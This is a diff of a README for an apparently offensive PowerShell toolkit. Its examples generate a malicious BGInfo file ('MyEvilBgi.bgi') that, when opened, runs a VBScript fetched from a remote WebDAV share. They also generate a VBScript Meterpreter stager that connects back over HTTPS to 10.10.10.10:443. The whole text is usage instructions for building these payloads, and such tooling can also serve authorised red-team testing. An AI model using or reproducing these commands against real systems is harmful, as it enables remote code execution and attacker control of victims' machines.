api0cradle/BGInfo/README.md

 How to use the functions:

-# Example 1
-New-BGIFile -FileName "StartCMD.bgi" -Script "StartCMD.vbs" -OutFilePath "C:\BGIPayload"

-# Example 2
+## Example ##
+This example will generate a file called MyEvilBgi.bgi and VBSMeterShell.vbs inside the c:\BGIPayload folder.
+The BGI file will try to execute \\10.10.10.10\webdav\VBSMeterShell.vbs when opened.

-New-BGIFile -FileName "MyPayload.bgi" -Script "\\10.10.10.10\webdav\VBSMeterShell.vbs" -OutFilePath "C:\BGIPayload"
+New-BGIFile -FileName "MyEvilBgi.bgi" -Script "\\10.10.10.10\webdav\VBSMeterShell.vbs" -OutFilePath "C:\BGIPayload"

-# Example 3
 New-VBSWebMeter -RHOST "10.10.10.10" -RPORT "443" -HTTPS "Yes" -OutFilePath "C:\BGIPayload" -OutFile "VBSMeterShell.vbs"